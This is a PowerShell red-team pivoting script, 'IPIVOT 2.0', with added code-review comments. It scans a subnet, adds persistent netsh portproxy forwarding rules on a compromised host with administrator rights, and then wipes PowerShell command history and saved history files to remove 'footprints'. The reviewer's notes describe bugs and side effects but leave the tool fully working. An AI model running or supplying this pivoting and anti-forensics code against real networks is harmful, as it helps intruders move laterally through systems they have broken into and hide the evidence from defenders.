<#
.SYNOPSIS
Probes each host built from Network + HostRange for an open ConnectingPort, adds one netsh portproxy rule per responding host, then clears the local PowerShell command history.
.DESCRIPTION
Review notes: every portproxy rule added by the scan loop is persistent and nothing in this script removes it, so the forwarding remains configured on the host after the script ends. The final Clear-SavedHistory call only touches the shell's own history; host-level PowerShell logging is unaffected. netsh portproxy requires an elevated session (the banner states "as Administrator"). None of the parameters are validated before being interpolated into the netsh command line (see the scan loop).
.PARAMETER ConnectingPort
TCP port probed on each host; becomes the connectport of the portproxy rule. Default 9080.
.PARAMETER ListeningPort
Local port the portproxy rule listens on. Default 9999. Every responding host gets a rule with the same listenaddress:listenport pair — presumably only the first add can take effect for that pair; verify the behaviour when more than one host answers.
.PARAMETER ListeningAddress
Local address the portproxy rule listens on. Default '127.0.0.1' (loopback only).
.PARAMETER Network
First three octets of the target network, e.g. '192.168.0'; joined with each HostRange value by a dot to form the address that is probed.
.PARAMETER HostRange
Last-octet values to try. Default 1..2 (i.e. only .1 and .2).
#>
param (
[int]$ConnectingPort = 9080,
[int]$ListeningPort = 9999,
[string]$ListeningAddress = '127.0.0.1',
[string]$Network = '192.168.0',
[int[]]$HostRange = 1..2
)
# Banner, printed verbatim as one multi-line string.
Write-Output "
****************************************************************************
# # # # # # #
# # # # # # #
# #
# #
# # # # # # # # # #
# # # ## # # # # #
# # # ## # # # #
# # # ## # # # #
# # # ## # # # #
# # ## # # # # # # # #
# # # # # # ## # # # # # # # #
# # # # # # ## # # # #
## # # # #
## # # # #
## #### 2.0
IPIVOT 2.0 - Red Teaming Tool
By: @fort3 - Fortune Sam Okon
@TrimarcJake - Jake Hildreth
Description: A little pivoting tool for when your favourite meterpreter shell fails...
Prequisites: Identify and Gain Initial Foothold on Target as Administrator
PS: If you happen to find this tool useful then I wouldn't mind a mention ;)
*******************************************************************************
"
# Review: this silences every non-terminating error for the rest of the script
# (a failed TcpClient constructor, Get-NetTCPConnection on a port with no
# listener, ...), so failures produce no diagnostic at all. A narrow
# -ErrorAction on the individual calls would be clearer, and the previous
# value is never restored.
$ErrorActionPreference= 'silentlycontinue'
#list the network and ports found and apply the forwarding
# NOTE(review): $i is never incremented inside the loop, so PercentComplete is
# constant at 1/Count rather than advancing with each host.
$i = 1
foreach ($HostAddress in $HostRange) {
# Dotted address = Network prefix + last octet. $network resolves to the
# $Network parameter (PowerShell variable names are case-insensitive).
$ip = "{0}.{1}" -f $network, $HostAddress
Write-Progress "Scanning Network" $ip -PercentComplete (($i / $HostRange.Count) * 100)
# ICMP reachability gate before the TCP probe: a host that drops ICMP echo
# is skipped even if the port would have been open.
If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip) {
# The constructor connects immediately. Under the SilentlyContinue preference
# set above a refused connect leaves $socket unset, so the .Connected test
# below falls through to the else branch. No connect timeout is specified —
# presumably the OS default applies, so a filtered port can stall here; verify.
$socket = new-object System.Net.Sockets.TcpClient($ip, $ConnectingPort)
If ($socket.Connected) {
"$ip port $ConnectingPort is open"
# NOTE(review): '\n' is not an escape sequence in PowerShell strings (the
# backtick form is), so it is printed literally here; the whole string is
# bound to -Activity.
Write-Progress "Forwarding from listening ${ListeningAddress}:$ListeningPort to target\n"
Write-Output "Forwarding from listening ${ListeningAddress}:$ListeningPort to target......."
Write-Output "____________________________________________________________________________________________________________________________"
#piece of the script that does the forwarding
# Review: the netsh command line is assembled by string interpolation and run
# through Invoke-Expression, so any parameter value containing shell
# metacharacters is interpreted rather than passed as data — invoking netsh
# directly with its arguments would avoid that. The try/catch only sees
# PowerShell exceptions; a non-zero exit status from netsh is not caught, and
# with ErrorActionPreference = SilentlyContinue it is not reported either.
# The rule this adds is persistent and is never deleted by this script.
try {
Invoke-Expression "netsh interface portproxy add v4tov4 listenaddress=$($ListeningAddress) listenport=$($ListeningPort) connectaddress=$($ip) connectport=$($ConnectingPort)"
} catch {
Write-Warning "Could not forward ${ListeningAddress}:$ListeningPort to target......."
}
Write-Progress "Checking if host is listening on port $ListeningPort and $ConnectingPort`n"
Write-Output "Checking if host is listening on port $ListeningPort and $ConnectingPort"
#verify that the port is listening
# Lists every local TCP connection on each port, not just the portproxy
# listener; the rule took effect only if an entry appears for $ListeningPort.
# Both calls are unfiltered and their output goes straight to the pipeline.
Get-NetTCPConnection -LocalPort $ListeningPort
Get-NetTCPConnection -LocalPort $ConnectingPort
Write-Output "***************************************************************************************************************************"
# Close the probe connection; only the connected branch holds an open socket.
$socket.Close()
} else {
"$ip port $ConnectingPort is not open "
}
}
}
Write-Output "***************************************************************************************************************************"
Write-Progress "Now clearing command history and footprints from powershell saved sessions......."
Write-Output "Now clearing command history and footprints from powershell saved sessions......."
#Clears the command history, including the saved-to-file history, if applicable.
#CAUTION!!! As this is a high impact activity, you will asked to confirm this action
# Scope note: only the shell's own history (Get-History, PSReadLine's session
# buffer and its HistorySavePath file, or the doskey buffer) is touched. Host-level
# PowerShell logging is outside this function and remains unaffected.
# Parameters: none. Output: none (verbose messages only). Returns early without
# changes when ShouldProcess is declined.
function Clear-SavedHistory {
[CmdletBinding(ConfirmImpact='High', SupportsShouldProcess)]
param(
)
# Get-Module without -ListAvailable reports only modules imported into this
# session, so an installed-but-not-loaded PSReadLine counts as absent here.
$havePSReadline = ($null -ne (Get-Module -EA SilentlyContinue PSReadline))
Write-Verbose "PSReadline present: $havePSReadline"
$target = if ($havePSReadline)
{
"entire command history, including from previous sessions"
}
else
{
"command history"
}
# ConfirmImpact='High' means this prompts under the default $ConfirmPreference
# unless the caller passes -Confirm:$false (or -WhatIf).
if (-not $pscmdlet.ShouldProcess($target))
{
return
}
if ($havePSReadline)
{
Clear-Host
# Remove PSReadline's saved-history file.Get-History
if (Test-Path (Get-PSReadlineOption).HistorySavePath)
{
# Abort, if the file for some reason cannot be removed.
# -EA Stop overrides the script-wide SilentlyContinue so a locked file is not ignored silently.
Remove-Item -EA Stop (Get-PSReadlineOption).HistorySavePath
# To be safe, we recreate the file (empty).
$null = New-Item -Type File -Path (Get-PSReadlineOption).HistorySavePath
}
# Clear PowerShell's own history
Clear-History
# Clear PSReadline's *session* history.
# NOTE(review): presumably requires a PSReadLine version that exposes this static
# method; on an older module the call would fail — confirm against the target version.
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
}
else
{ # Without PSReadline, we only have a *session* history.
Clear-Host
# Clear the doskey library's buffer, used pre-PSReadline.
# !! Unfortunately, this requires sending key combination Alt+F7.
# Thanks, https://stackoverflow.com/a/13257933/45375
# SendKeys targets the foreground window, so this only works when the console
# itself has focus; in a non-interactive or unfocused session the keystrokes
# go elsewhere and the buffer is left untouched.
$null = [system.reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[System.Windows.Forms.SendKeys]::Sendwait('%{F7 2}')
# Clear PowerShell's own history
Clear-History
}
}
# Called without -Confirm:$false, so under the default $ConfirmPreference the
# function's ShouldProcess gate prompts interactively before clearing anything.
Clear-SavedHistory